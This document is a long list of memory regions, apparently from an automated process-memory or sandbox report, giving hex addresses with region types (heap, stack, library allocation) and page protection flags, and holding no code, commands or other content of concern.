page read and write
18C46B1B000
heap
page read and write
166365F0000
heap
page read and write
224B55D1000
heap
page read and write
1E89B880000
heap
page read and write
7FFAACD70000
trusted library allocation
page execute and read and write
17AF71A5000
heap
page read and write
2249EE67000
trusted library allocation
page read and write
2249E24E000
trusted library allocation
page read and write
207245A2000
heap
page read and write
3E2D57E000
stack
page read and write
207245B2000
heap
page read and write
2072459B000
heap
page read and write
1661EFF6000
trusted library allocation
page read and write
7FFAACFE6000
trusted library allocation
page read and write
1E89B850000
heap
page read and write
18C46B0A000
heap
page read and write
F4E000
heap
page read and write
7FFAACFB0000
trusted library allocation
page execute and read and write
207245AC000
heap
page read and write
19F10FE000
stack
page read and write
166366A4000
heap
page read and write
18C48A18000
heap
page read and write
7FFAACF14000
trusted library allocation
page read and write
7FFAACFCC000
trusted library allocation
page read and write
18C489EF000
heap
page read and write
20724731000
heap
page read and write
7FFAACFD6000
trusted library allocation
page read and write
18C48A20000
heap
page read and write
1C437A70000
heap
page read and write
1C43D380000
trusted library allocation
page read and write
18C48A0B000
heap
page read and write
207245C6000
heap
page read and write
41487B3000
stack
page read and write
19F2247000
stack
page read and write
1E89D421000
trusted library allocation
page read and write
207245B1000
heap
page read and write
1661F8E2000
trusted library allocation
page read and write
18C46AF3000
heap
page read and write
207245AC000
heap
page read and write
224AD33B000
trusted library allocation
page read and write
1D925FE000
unkown
page readonly
18C46B4D000
heap
page read and write
207245AC000
heap
page read and write
20724682000
heap
page read and write
224AD32D000
trusted library allocation
page read and write
18C48A20000
heap
page read and write
7FFAACE80000
trusted library allocation
page read and write
2249DC46000
trusted library allocation
page read and write
20724678000
heap
page read and write
18C48A0E000
heap
page read and write
18C48BA3000
heap
page read and write
33223CF000
stack
page read and write
1D922FE000
unkown
page readonly
18C48A01000
heap
page read and write
18C46AF6000
heap
page read and write
18C48A12000
heap
page read and write
1C437C2B000
heap
page read and write
224B5550000
heap
page read and write
18C46AEF000
heap
page read and write
7FFAACE41000
trusted library allocation
page read and write
E7AC98E000
stack
page read and write
207225E8000
heap
page read and write
1C43D230000
trusted library allocation
page read and write
1E8B5AA8000
heap
page read and write
7FFAACD30000
trusted library allocation
page read and write
3322C7B000
stack
page read and write
1C437C83000
heap
page read and write
7FFAACD70000
trusted library allocation
page execute and read and write
4149CC9000
stack
page read and write
7FFAACBA0000
trusted library allocation
page read and write
17AF54D3000
heap
page read and write
207245A1000
heap
page read and write
17A902ED000
trusted library allocation
page read and write
1C439102000
heap
page read and write
7FFAACBDC000
trusted library allocation
page execute and read and write
2072459E000
heap
page read and write
7FFAACF28000
trusted library allocation
page read and write
E8F000
stack
page read and write
7FFAACB8D000
trusted library allocation
page execute and read and write
20724670000
heap
page read and write
1B5CF000
stack
page read and write
1E89F244000
trusted library allocation
page read and write
207246F8000
heap
page read and write
7FFAACE20000
trusted library allocation
page read and write
18C46B04000
heap
page read and write
2249D035000
heap
page read and write
207245B7000
heap
page read and write
1E8B5A0D000
heap
page read and write
7FFAACDA2000
trusted library allocation
page read and write
1B89E000
stack
page read and write
18C48A12000
heap
page read and write
207246DB000
heap
page read and write
207245C2000
heap
page read and write
1E89E138000
trusted library allocation
page read and write
207245A1000
heap
page read and write
207245AC000
heap
page read and write
7FFAACE70000
trusted library allocation
page read and write
2072457E000
heap
page read and write
18C46B20000
heap
page read and write
1E89B9D0000
heap
page read and write
7FFAACC3C000
trusted library allocation
page execute and read and write
18C48AF3000
heap
page read and write
207225C8000
heap
page read and write
18C48A05000
heap
page read and write
1BBA0000
heap
page read and write
25ED87E000
stack
page read and write
207245A1000
heap
page read and write
18C48A28000
heap
page read and write
17A8130C000
trusted library allocation
page read and write
20724569000
heap
page read and write
1661F050000
trusted library allocation
page read and write
17A81036000
trusted library allocation
page read and write
18C48A05000
heap
page read and write
7FFAACCA0000
trusted library allocation
page execute and read and write
1C43D300000
trusted library allocation
page read and write
7FFAACFA0000
trusted library allocation
page read and write
7FFB1E3C2000
unkown
page readonly
1661F7FA000
trusted library allocation
page read and write
332364E000
stack
page read and write
18C48A21000
heap
page read and write
20722581000
heap
page read and write
7FFAACC40000
trusted library allocation
page read and write
207245C2000
heap
page read and write
207245BA000
heap
page read and write
1E89ED14000
trusted library allocation
page read and write
18C48A12000
heap
page read and write
18C489EA000
heap
page read and write
1E89D8EE000
trusted library allocation
page read and write
166366A0000
heap
page read and write
207245B1000
heap
page read and write
7FFAACD64000
trusted library allocation
page read and write
7FFAACED0000
trusted library allocation
page read and write
7FFAACED4000
trusted library allocation
page read and write
7FFAACFD0000
trusted library allocation
page read and write
7FFAACEE5000
trusted library allocation
page read and write
1C438FB0000
trusted library allocation
page read and write
1663666B000
heap
page read and write
19F214E000
stack
page read and write
E7AB57D000
stack
page read and write
18C48B9E000
heap
page read and write
18C489D2000
heap
page read and write
17AF54C7000
heap
page read and write
7FFAACFC0000
trusted library allocation
page read and write
7FFB1E3A1000
unkown
page execute read
414917B000
stack
page read and write
1E8AD421000
trusted library allocation
page read and write
18C46B03000
heap
page read and write
207245B1000
heap
page read and write
1662E243000
trusted library allocation
page read and write
20724562000
heap
page read and write
18C46B37000
heap
page read and write
19F177B000
stack
page read and write
17A80F72000
trusted library allocation
page read and write
17A90031000
trusted library allocation
page read and write
18C4B20C000
heap
page read and write
207225B9000
heap
page read and write
18C48A20000
heap
page read and write
207245C2000
heap
page read and write
2072457E000
heap
page read and write
1D921FE000
unkown
page readonly
18C48A00000
heap
page read and write
18C48B65000
heap
page read and write
1D9147E000
stack
page read and write
12A73000
trusted library allocation
page read and write
286F000
stack
page read and write
1E8B5ADC000
heap
page read and write
18C489EF000
heap
page read and write
20724583000
heap
page read and write
7FFAACC66000
trusted library allocation
page execute and read and write
17AF54C0000
heap
page read and write
E7AB87E000
stack
page read and write
1D9247E000
stack
page read and write
224B588A000
heap
page read and write
7FFAACB9D000
trusted library allocation
page execute and read and write
18C46B23000
heap
page read and write
20722587000
heap
page read and write
F40000
heap
page read and write
207245A6000
heap
page read and write
19F0D3E000
stack
page read and write
17AF79D0000
heap
page read and write
1C437CCD000
heap
page read and write
20728BA3000
heap
page read and write
1D9177E000
stack
page read and write
1C4383D1000
trusted library allocation
page read and write
7FFAACC70000
trusted library allocation
page execute and read and write
7FFAACEE2000
trusted library allocation
page read and write
16636590000
heap
page read and write
1E8B58A8000
heap
page read and write
20724650000
heap
page read and write
19F0DBE000
stack
page read and write
18C48B77000
heap
page read and write
20722564000
heap
page read and write
1C438940000
trusted library allocation
page read and write
19F234E000
stack
page read and write
17AF6F30000
heap
page execute and read and write
7FFAACE60000
trusted library allocation
page read and write
207245B2000
heap
page read and write
7FFAACF30000
trusted library allocation
page read and write
332374E000
stack
page read and write
207246F2000
heap
page read and write
18C489E4000
heap
page read and write
7FFAACC30000
trusted library allocation
page read and write
7FFB23AF6000
unkown
page readonly
7FFAACBC0000
trusted library allocation
page read and write
207245A1000
heap
page read and write
17A81E02000
trusted library allocation
page read and write
2560000
trusted library allocation
page read and write
1E8B5AE1000
heap
page read and write
7FFAACB8D000
trusted library allocation
page execute and read and write
3322283000
stack
page read and write
18C489FF000
heap
page read and write
224AD3B4000
trusted library allocation
page read and write
207245A1000
heap
page read and write
207245B2000
heap
page read and write
20724596000
heap
page read and write
207245C6000
heap
page read and write
17A90021000
trusted library allocation
page read and write
7FFAACD31000
trusted library allocation
page read and write
2249CF00000
heap
page execute and read and write
17AF5480000
heap
page read and write
18C48A05000
heap
page read and write
7FFAACEB0000
trusted library allocation
page read and write
18C48A28000
heap
page read and write
18C48B9A000
heap
page read and write
1C4390E9000
heap
page read and write
1E8AD496000
trusted library allocation
page read and write
3E2D8FE000
stack
page read and write
207245BE000
heap
page read and write
2072258F000
heap
page read and write
2249B5E8000
heap
page read and write
18C48A1C000
heap
page read and write
A80000
unkown
page readonly
20722500000
heap
page read and write
7FFAACDE0000
trusted library allocation
page read and write
18C48A0F000
heap
page read and write
20722582000
heap
page read and write
18C46B32000
heap
page read and write
7FFAACC50000
trusted library allocation
page execute and read and write
F00000
heap
page read and write
18C48A0B000
heap
page read and write
7FFAACE65000
trusted library allocation
page read and write
224B5540000
heap
page execute and read and write
18C489EA000
heap
page read and write
17A80F87000
trusted library allocation
page read and write
1C437C41000
heap
page read and write
7FFAACDC0000
trusted library allocation
page read and write
C20000
heap
page read and write
E20000
heap
page read and write
7FFB23B00000
unkown
page read and write
207245C6000
heap
page read and write
1C43D220000
trusted library allocation
page read and write
18C48A28000
heap
page read and write
18C48A24000
heap
page read and write
7FFAACED4000
trusted library allocation
page read and write
7FFAACEE2000
trusted library allocation
page read and write
7FFAACED9000
trusted library allocation
page read and write
207245B2000
heap
page read and write
7FFAACDD0000
trusted library allocation
page read and write
18C48A05000
heap
page read and write
7FFAACE80000
trusted library allocation
page read and write
2072259B000
heap
page read and write
18C48A18000
heap
page read and write
207245A6000
heap
page read and write
17AF7750000
heap
page read and write
BE5000
heap
page read and write
1662E280000
trusted library allocation
page read and write
1661FDB9000
trusted library allocation
page read and write
18C46B0C000
heap
page read and write
1661C2E0000
heap
page read and write
18C48A0B000
heap
page read and write
2072473D000
heap
page read and write
224AD071000
trusted library allocation
page read and write
2CBE000
stack
page read and write
7FFAACFF0000
trusted library allocation
page execute and read and write
207225D8000
heap
page read and write
20724676000
heap
page read and write
207246DB000
heap
page read and write
18C48A1D000
heap
page read and write
7FFAACFA0000
trusted library allocation
page read and write
1C437A50000
heap
page read and write
2249D041000
trusted library allocation
page read and write
1C43D231000
trusted library allocation
page read and write
18C48A28000
heap
page read and write
3E2D67E000
stack
page read and write
1C43D230000
trusted library allocation
page read and write
18C489D2000
heap
page read and write
18C48A05000
heap
page read and write
7FFAACF22000
trusted library allocation
page read and write
18C48BA0000
heap
page read and write
18C46B09000
heap
page read and write
1E8B5880000
heap
page read and write
18C48B25000
heap
page read and write
1B2CE000
stack
page read and write
19F15FE000
stack
page read and write
1E8B5A66000
heap
page read and write
20724674000
heap
page read and write
207245BB000
heap
page read and write
E7AB5FF000
stack
page read and write
207245C4000
heap
page read and write
7FFAACEE8000
trusted library allocation
page read and write
7FFB1E3C5000
unkown
page readonly
17A80228000
trusted library allocation
page read and write
1661EB89000
trusted library allocation
page read and write
1C437C8C000
heap
page read and write
7FFAACD60000
trusted library allocation
page read and write
7FFAACF10000
trusted library allocation
page read and write
2249E8CF000
trusted library allocation
page read and write
1E89B980000
trusted library allocation
page read and write
2249E3C7000
trusted library allocation
page read and write
19F167C000
stack
page read and write
1D91FFE000
unkown
page readonly
E7AB4F3000
stack
page read and write
207245BB000
heap
page read and write
2760000
heap
page read and write
7FFAACC76000
trusted library allocation
page read and write
1661F355000
trusted library allocation
page read and write
18C489FD000
heap
page read and write
18C48A20000
heap
page read and write
D90000
heap
page read and write
2249B59E000
heap
page read and write
17AF7142000
heap
page read and write
1C43D274000
trusted library allocation
page read and write
16636337000
heap
page read and write
1D9307E000
stack
page read and write
224AD34B000
trusted library allocation
page read and write
1C43D270000
trusted library allocation
page read and write
224B57CB000
heap
page read and write
1661C320000
heap
page read and write
E7AB97E000
stack
page read and write
7FFAACBC4000
trusted library allocation
page read and write
BA0000
heap
page read and write
18C46AFB000
heap
page read and write
7FFAACFC0000
trusted library allocation
page read and write
18C48A1C000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
18C48A05000
heap
page read and write
207246F0000
heap
page read and write
1C43D310000
trusted library allocation
page read and write
1D915F7000
stack
page read and write
1CC70000
heap
page read and write
17A80087000
trusted library allocation
page read and write
18C46AFB000
heap
page read and write
207245BE000
heap
page read and write
BF7000
heap
page read and write
7FFAACBA3000
trusted library allocation
page read and write
18C489FC000
heap
page read and write
7FFAACB83000
trusted library allocation
page execute and read and write
1B6F0000
heap
page read and write
19F234C000
stack
page read and write
1C438415000
heap
page read and write
2072257D000
heap
page read and write
18C48A08000
heap
page read and write
18C48B77000
heap
page read and write
207225A2000
heap
page read and write
1020000
heap
page read and write
18C489F8000
heap
page read and write
20722587000
heap
page read and write
7FFAACE30000
trusted library allocation
page read and write
18C4B221000
heap
page read and write
1E89E390000
trusted library allocation
page read and write
7FFAACE70000
trusted library allocation
page read and write
3E2D9FB000
stack
page read and write
1BF0F000
stack
page read and write
19F117A000
stack
page read and write
18C489F2000
heap
page read and write
1D91BFE000
unkown
page readonly
7FFAACBA0000
trusted library allocation
page read and write
166365CF000
heap
page read and write
207226E0000
heap
page read and write
17A902FA000
trusted library allocation
page read and write
18C48B87000
heap
page read and write
224B5878000
heap
page read and write
7FFAACD62000
trusted library allocation
page read and write
1B049000
heap
page read and write
207245A6000
heap
page read and write
7FFAACB9B000
trusted library allocation
page read and write
20724731000
heap
page read and write
1663669C000
heap
page read and write
7FFAACD50000
trusted library allocation
page read and write
18C46AEF000
heap
page read and write
1661C650000
heap
page execute and read and write
33228F9000
stack
page read and write
17AF721E000
heap
page read and write
1661F139000
trusted library allocation
page read and write
7FFAACC40000
trusted library allocation
page execute and read and write
7FFB1E3A0000
unkown
page readonly
B90000
heap
page read and write
18C48A18000
heap
page read and write
2072459B000
heap
page read and write
7FFAACF10000
trusted library allocation
page read and write
16636721000
heap
page read and write
18C48A0E000
heap
page read and write
18C489EF000
heap
page read and write
18C48B37000
heap
page read and write
18C48A0B000
heap
page read and write
17A90074000
trusted library allocation
page read and write
207245AC000
heap
page read and write
7FFAACF00000
trusted library allocation
page read and write
18C48A06000
heap
page read and write
18C48A30000
heap
page read and write
7FFAACB90000
trusted library allocation
page read and write
207245BE000
heap
page read and write
207245A6000
heap
page read and write
18C46B23000
heap
page read and write
207246F0000
heap
page read and write
7FFAACE30000
trusted library allocation
page read and write
18C48A2C000
heap
page read and write
25ED6FE000
stack
page read and write
1D92AFE000
unkown
page readonly
2249CEB0000
heap
page readonly
17A81829000
trusted library allocation
page read and write
18C4B22E000
heap
page read and write
18C48A24000
heap
page read and write
18C48B17000
heap
page read and write
16636662000
heap
page read and write
7FFAACF90000
trusted library allocation
page read and write
F2C000
heap
page read and write
18C48B80000
heap
page read and write
207245BB000
heap
page read and write
20724697000
heap
page read and write
18C48B5B000
heap
page read and write
18C46B1D000
heap
page read and write
7FFAACF73000
trusted library allocation
page read and write
7FFAACDC0000
trusted library allocation
page read and write
18C46AF3000
heap
page read and write
19F21CD000
stack
page read and write
E7ABAF9000
stack
page read and write
287C000
trusted library allocation
page read and write
224B5803000
heap
page read and write
1661F715000
trusted library allocation
page read and write
4149D4C000
stack
page read and write
2249B5A8000
heap
page read and write
224AD331000
trusted library allocation
page read and write
18C48A28000
heap
page read and write
17AF7847000
heap
page read and write
7FFB23AFD000
unkown
page readonly
17A81E21000
trusted library allocation
page read and write
1C438500000
heap
page read and write
2A7D000
trusted library allocation
page read and write
7FFAACF00000
trusted library allocation
page read and write
18C48A0B000
heap
page read and write
18C46ADE000
heap
page read and write
1C43D3D0000
remote allocation
page read and write
7FFAACBB4000
trusted library allocation
page read and write
20724596000
heap
page read and write
7FFAACD62000
trusted library allocation
page read and write
7FFAACBEC000
trusted library allocation
page execute and read and write
7FFAACEEA000
trusted library allocation
page read and write
1E89E028000
trusted library allocation
page read and write
2249B705000
heap
page read and write
18C489E4000
heap
page read and write
166367B0000
trusted library allocation
page read and write
2249B59C000
heap
page read and write
1661C570000
heap
page readonly
1C437CE1000
heap
page read and write
7DF4DE5A0000
trusted library allocation
page execute and read and write
1C437D29000
heap
page read and write
1E8B582B000
heap
page read and write
7FFAACD90000
trusted library allocation
page read and write
18C48A13000
heap
page read and write
224B5593000
heap
page read and write
18C48A18000
heap
page read and write
207245C2000
heap
page read and write
18C489F1000
heap
page read and write
10A5000
heap
page read and write
1662E002000
trusted library allocation
page read and write
207245BE000
heap
page read and write
2249E042000
trusted library allocation
page read and write
207245BB000
heap
page read and write
BFC000
heap
page read and write
18C4B22A000
heap
page read and write
7FFAACB8D000
trusted library allocation
page execute and read and write
207245B6000
heap
page read and write
18C48B17000
heap
page read and write
207225C0000
heap
page read and write
224B5750000
heap
page read and write
1D9227E000
stack
page read and write
7FFAACB82000
trusted library allocation
page read and write
2072459B000
heap
page read and write
1C437C9F000
heap
page read and write
20724691000
heap
page read and write
20724678000
heap
page read and write
18C48AEE000
heap
page read and write
18C46B0D000
heap
page read and write
7FFAACE90000
trusted library allocation
page read and write
18C46B07000
heap
page read and write
1D91EFA000
stack
page read and write
224AD041000
trusted library allocation
page read and write
1E8B5986000
heap
page read and write
1B490000
heap
page read and write
1C43D380000
trusted library allocation
page read and write
1E89D3A0000
heap
page execute and read and write
166362D0000
heap
page read and write
332238E000
stack
page read and write
1C43851A000
heap
page read and write
1C43D250000
trusted library allocation
page read and write
7FFAACFF0000
trusted library allocation
page read and write
19F0DFF000
stack
page read and write
7DF4DE5B0000
trusted library allocation
page execute and read and write
207225E8000
heap
page read and write
224B58F4000
heap
page read and write
18C48B77000
heap
page read and write
2249B560000
heap
page read and write
18C48A01000
heap
page read and write
18C48B1E000
heap
page read and write
2072459B000
heap
page read and write
7FFAACED9000
trusted library allocation
page read and write
18C489EA000
heap
page read and write
1E89D410000
heap
page execute and read and write
20724568000
heap
page read and write
207245BA000
heap
page read and write
224B55D8000
heap
page read and write
207245C7000
heap
page read and write
1E89D397000
heap
page execute and read and write
18C48A20000
heap
page read and write
7FFAACD50000
trusted library allocation
page execute and read and write
1C43E000000
heap
page read and write
7FFAACF40000
trusted library allocation
page read and write
1CA6D000
stack
page read and write
18C48B17000
heap
page read and write
207225A0000
heap
page read and write
1E89DE73000
trusted library allocation
page read and write
25ED7FF000
stack
page read and write
2072459B000
heap
page read and write
207245AC000
heap
page read and write
7FFAACD60000
trusted library allocation
page execute and read and write
1661F821000
trusted library allocation
page read and write
4148F7A000
stack
page read and write
1C437B90000
trusted library section
page read and write
2249B530000
heap
page read and write
1E89E72A000
trusted library allocation
page read and write
18C48A00000
heap
page read and write
1E89B69C000
heap
page read and write
1D068000
stack
page read and write
FF2000
heap
page read and write
1BD9E000
stack
page read and write
207225AC000
heap
page read and write
10A0000
heap
page read and write
17AF7865000
heap
page read and write
18C48ADE000
heap
page read and write
1CCAE000
heap
page read and write
207245A6000
heap
page read and write
207246F0000
heap
page read and write
18C48A24000
heap
page read and write
18C48A20000
heap
page read and write
1D917FE000
unkown
page readonly
17A81126000
trusted library allocation
page read and write
1C437B50000
heap
page read and write
1C96E000
stack
page read and write
7FFAACE50000
trusted library allocation
page read and write
7FFAACF90000
trusted library allocation
page read and write
20724562000
heap
page read and write
7FFAACBA0000
trusted library allocation
page read and write
2072472F000
heap
page read and write
B54000
heap
page read and write
17AF6F94000
heap
page read and write
1E89B640000
heap
page read and write
7FFAACE70000
trusted library allocation
page read and write
207225B8000
heap
page read and write
17AF5508000
heap
page read and write
1D9277E000
stack
page read and write
18C48A20000
heap
page read and write
17A80BFA000
trusted library allocation
page read and write
17AF6F85000
heap
page read and write
1C439095000
heap
page read and write
1C438C10000
trusted library section
page readonly
18C489D9000
heap
page read and write
18C48B17000
heap
page read and write
F8D000
heap
page read and write
1C4390BA000
heap
page read and write
207245A6000
heap
page read and write
7FFAACDA4000
trusted library allocation
page read and write
17A9030B000
trusted library allocation
page read and write
7FFAACE10000
trusted library allocation
page read and write
17AF54B0000
trusted library section
page read and write
18C48A05000
heap
page read and write
17AF5490000
heap
page read and write
1E8B57D5000
heap
page read and write
48A293F000
unkown
page read and write
2072459B000
heap
page read and write
4148EF9000
stack
page read and write
33227F7000
stack
page read and write
1E89E0BA000
trusted library allocation
page read and write
25ED678000
stack
page read and write
2610000
heap
page execute and read and write
2072456B000
heap
page read and write
1663665D000
heap
page read and write
17A80F69000
trusted library allocation
page read and write
207245C6000
heap
page read and write
18C489DF000
heap
page read and write
B26000
heap
page read and write
19F11FE000
stack
page read and write
7FFB23B00000
unkown
page read and write
B95000
heap
page read and write
18C48335000
heap
page read and write
7FFAACE82000
trusted library allocation
page read and write
207246DB000
heap
page read and write
7FFAAD000000
trusted library allocation
page read and write
7FFAACDF0000
trusted library allocation
page read and write
18C48B87000
heap
page read and write
33237C9000
stack
page read and write
17AF5546000
heap
page read and write
207245C6000
heap
page read and write
18C489FD000
heap
page read and write
1661DF80000
heap
page read and write
20724593000
heap
page read and write
271F000
stack
page read and write
1661FDB4000
trusted library allocation
page read and write
7FFAAD000000
trusted library allocation
page read and write
18C48A1C000
heap
page read and write
1E89B673000
heap
page read and write
18C48BB9000
heap
page read and write
2072457A000
heap
page read and write
20724672000
heap
page read and write
7FFAACBCD000
trusted library allocation
page execute and read and write
2249E7C3000
trusted library allocation
page read and write
19F12FD000
stack
page read and write
1E89B9D5000
heap
page read and write
18C489EA000
heap
page read and write
20724592000
heap
page read and write
18C48A30000
heap
page read and write
7FFAACFD0000
trusted library allocation
page read and write
7FFAACF00000
trusted library allocation
page read and write
1B99E000
stack
page read and write
18C48A09000
heap
page read and write
1ACF0000
trusted library allocation
page read and write
7FFAACD90000
trusted library allocation
page execute and read and write
18C48A0E000
heap
page read and write
25ED77E000
stack
page read and write
18C48A09000
heap
page read and write
3E2D6FB000
stack
page read and write
18C489C0000
heap
page read and write
18C48A24000
heap
page read and write
18C48A2C000
heap
page read and write
4148A7E000
stack
page read and write
12A71000
trusted library allocation
page read and write
2249EE42000
trusted library allocation
page read and write
18C48A1C000
heap
page read and write
18C48B6F000
heap
page read and write
20724583000
heap
page read and write
13B0000
heap
page execute and read and write
1661C3AD000
heap
page read and write
20724733000
heap
page read and write
7FFAACED4000
trusted library allocation
page read and write
E7ABE3E000
stack
page read and write
7FFAACCD0000
trusted library allocation
page execute and read and write
2072457B000
heap
page read and write
2249E0F9000
trusted library allocation
page read and write
2249DDB4000
trusted library allocation
page read and write
7FFAACD90000
trusted library allocation
page read and write
2860000
heap
page execute and read and write
1B79F000
stack
page read and write
1C438C40000
trusted library section
page readonly
7FFAACD70000
trusted library allocation
page execute and read and write
1C438C30000
trusted library section
page readonly
4148FFE000
stack
page read and write
207245BE000
heap
page read and write
207245B1000
heap
page read and write
7FFAACFA6000
trusted library allocation
page read and write
207245B7000
heap
page read and write
20724700000
heap
page read and write
7FFAACCA0000
trusted library allocation
page execute and read and write
18C48A18000
heap
page read and write
1B4CE000
stack
page read and write
1BF50000
heap
page read and write
2249B6F0000
trusted library allocation
page read and write
7FFAACFC0000
trusted library allocation
page read and write
7FFAACDD0000
trusted library allocation
page read and write
7FFAACEA0000
trusted library allocation
page read and write
20724596000
heap
page read and write
18C48A30000
heap
page read and write
207245C7000
heap
page read and write
18C48BA3000
heap
page read and write
20724691000
heap
page read and write
2072459B000
heap
page read and write
41487FF000
stack
page read and write
1C437C89000
heap
page read and write
20724674000
heap
page read and write
20722590000
heap
page read and write
2072459B000
heap
page read and write
16636318000
heap
page read and write
1661C360000
heap
page read and write
7FFAACFE0000
trusted library allocation
page read and write
18C48B1E000
heap
page read and write
1CC73000
heap
page read and write
207245A2000
heap
page read and write
18C48A1C000
heap
page read and write
7FFAACCE0000
trusted library allocation
page execute and read and write
E7ABC3B000
stack
page read and write
12873000
trusted library allocation
page read and write
20724583000
heap
page read and write
7FFAACD68000
trusted library allocation
page read and write
1E89E670000
trusted library allocation
page read and write
1E89B6BC000
heap
page read and write
224B58CC000
heap
page read and write
18C48A0B000
heap
page read and write
18C48B9E000
heap
page read and write
207246F0000
heap
page read and write
1E8B59C5000
heap
page read and write
7FFAACE90000
trusted library allocation
page read and write
17A813C5000
trusted library allocation
page read and write
7FFAACB90000
trusted library allocation
page read and write
1663631A000
heap
page read and write
7FFAACB8D000
trusted library allocation
page execute and read and write
2249B642000
heap
page read and write
7FFAACF10000
trusted library allocation
page read and write
2249DA93000
trusted library allocation
page read and write
18C4B200000
heap
page read and write
207245B2000
heap
page read and write
2072458E000
heap
page read and write
7FFAACEE0000
trusted library allocation
page read and write
1661E016000
trusted library allocation
page read and write
1B43E000
stack
page read and write
20724580000
heap
page read and write
2072466C000
heap
page read and write
1D919FE000
unkown
page readonly
20724592000
heap
page read and write
20722582000
heap
page read and write
207225A6000
heap
page read and write
1D92BFD000
stack
page read and write
166363A8000
heap
page read and write
7FFAACC30000
trusted library allocation
page read and write
18C489F9000
heap
page read and write
7FFAACF90000
trusted library allocation
page read and write
20724592000
heap
page read and write
18C46B37000
heap
page read and write
25ED9FB000
stack
page read and write
18C489EF000
heap
page read and write
1663671B000
heap
page read and write
1C660000
heap
page read and write
12D0000
trusted library allocation
page read and write
48A29BE000
stack
page read and write
1C43851A000
heap
page read and write
20723EC0000
heap
page read and write
207245BE000
heap
page read and write
18C489EF000
heap
page read and write
1C437B80000
trusted library allocation
page read and write
18C46B06000
heap
page read and write
20724596000
heap
page read and write
1E89E3A1000
trusted library allocation
page read and write
20722595000
heap
page read and write
207245B6000
heap
page read and write
18C48AF5000
heap
page read and write
18C489F5000
heap
page read and write
17AF7670000
heap
page read and write
18C48A1C000
heap
page read and write
1330000
heap
page read and write
18C48BB9000
heap
page read and write
1E89B6E3000
heap
page read and write
18C48A20000
heap
page read and write
18C46B60000
heap
page read and write
1E89E05C000
trusted library allocation
page read and write
207245A1000
heap
page read and write
20726DD0000
heap
page read and write
207245BA000
heap
page read and write
1E89B6A0000
heap
page read and write
207245A8000
heap
page read and write
207225BF000
heap
page read and write
18C48ADB000
heap
page read and write
18C48BA0000
heap
page read and write
166365CD000
heap
page read and write
20724676000
heap
page read and write
1C4390FF000
heap
page read and write
1C437CA5000
heap
page read and write
18C48AF5000
heap
page read and write
7FFAACFF0000
trusted library allocation
page read and write
18C48B80000
heap
page read and write
1C439047000
heap
page read and write
7FFAACE60000
trusted library allocation
page read and write
7FFAACC3C000
trusted library allocation
page execute and read and write
7FFB1E3B6000
unkown
page readonly
7FFAACE80000
trusted library allocation
page read and write
18C48A2C000
heap
page read and write
2072457F000
heap
page read and write
1E89F249000
trusted library allocation
page read and write
1C4390E3000
heap
page read and write
18C48BA0000
heap
page read and write
16636447000
heap
page execute and read and write
20724579000
heap
page read and write
18C48A18000
heap
page read and write
7FFAACDE0000
trusted library allocation
page read and write
20728BA7000
heap
page read and write
1E89E023000
trusted library allocation
page read and write
1661C3B1000
heap
page read and write
1C439000000
heap
page read and write
3E2D97C000
stack
page read and write
18C48B5E000
heap
page read and write
1662E288000
trusted library allocation
page read and write
7FFAACBDC000
trusted library allocation
page execute and read and write
7FFAACE50000
trusted library allocation
page read and write
207245C2000
heap
page read and write
1661F0B3000
trusted library allocation
page read and write
18C489EF000
heap
page read and write
1661C3B9000
heap
page read and write
20724596000
heap
page read and write
207225EA000
heap
page read and write
207245BA000
heap
page read and write
20724577000
heap
page read and write
207246F0000
heap
page read and write
1E89D390000
heap
page execute and read and write
18C48A18000
heap
page read and write
17A80F65000
trusted library allocation
page read and write
207225B1000
heap
page read and write
4148AFE000
stack
page read and write
18C489EF000
heap
page read and write
20723FDA000
heap
page read and write
7FFAACBDB000
trusted library allocation
page read and write
E7ABBB7000
stack
page read and write
17AF54FE000
heap
page read and write
207245BF000
heap
page read and write
20724731000
heap
page read and write
332267E000
stack
page read and write
2249B690000
heap
page read and write
7FFAACE20000
trusted library allocation
page read and write
166366DA000
heap
page read and write
7FFAACD80000
trusted library allocation
page read and write
7FFAACE40000
trusted library allocation
page read and write
224B5670000
heap
page read and write
1E89B940000
trusted library allocation
page read and write
18C46AFB000
heap
page read and write
7FFAACFD0000
trusted library allocation
page read and write
12A78000
trusted library allocation
page read and write
1C4390FD000
heap
page read and write
1661DE22000
heap
page read and write
1843ECA9000
heap
page read and write
7FFAACD64000
trusted library allocation
page read and write
18C4B229000
heap
page read and write
7FFAACB90000
trusted library allocation
page read and write
B5F000
heap
page read and write
7FFAACC36000
trusted library allocation
page read and write
18C48A05000
heap
page read and write
1090000
trusted library allocation
page read and write
3322BFE000
stack
page read and write
18C48A20000
heap
page read and write
18C48A12000
heap
page read and write
1E89E387000
trusted library allocation
page read and write
224AD333000
trusted library allocation
page read and write
18C48A2D000
heap
page read and write
18C48A1C000
heap
page read and write
7FFAACD71000
trusted library allocation
page read and write
33236CD000
stack
page read and write
7FFAACC66000
trusted library allocation
page execute and read and write
2249E2E2000
trusted library allocation
page read and write
E7ABA7D000
stack
page read and write
17AF6F80000
heap
page read and write
1661C560000
trusted library allocation
page read and write
1661C5B0000
trusted library allocation
page read and write
C2C000
heap
page read and write
1300000
heap
page execute and read and write
1D46E000
stack
page read and write
7FFAACC3C000
trusted library allocation
page execute and read and write
19F1379000
stack
page read and write
7FFAACEB0000
trusted library allocation
page read and write
7FFAACE94000
trusted library allocation
page read and write
207245C2000
heap
page read and write
166365AF000
heap
page read and write
2249B450000
heap
page read and write
2590000
heap
page read and write
1E89B660000
heap
page read and write
207245C2000
heap
page read and write
20722587000
heap
page read and write
1C19C000
stack
page read and write
1C43D3D0000
remote allocation
page read and write
BC0000
heap
page read and write
18C48A0B000
heap
page read and write
207245A1000
heap
page read and write
1D9287E000
stack
page read and write
18C489F3000
heap
page read and write
7FFAACEF0000
trusted library allocation
page read and write
E7AC90C000
stack
page read and write
1E8B5A1D000
heap
page read and write
25EDC7B000
stack
page read and write
207245AC000
heap
page read and write
20724596000
heap
page read and write
7FFAACFDD000
trusted library allocation
page read and write
7FFAACEE0000
trusted library allocation
page read and write
1E89D4A8000
trusted library allocation
page read and write
18C48A20000
heap
page read and write
7FFB23AF9000
unkown
page readonly
18C48A12000
heap
page read and write
2249B5A2000
heap
page read and write
18C48A13000
heap
page read and write
1ADFD000
stack
page read and write
2249B5AA000
heap
page read and write
11AE000
stack
page read and write
1C437CEE000
heap
page read and write
18C489FC000
heap
page read and write
2072472F000
heap
page read and write
7DF4588C0000
trusted library allocation
page execute and read and write
3322B7E000
stack
page read and write
7FFAACC66000
trusted library allocation
page execute and read and write
A30000
heap
page read and write
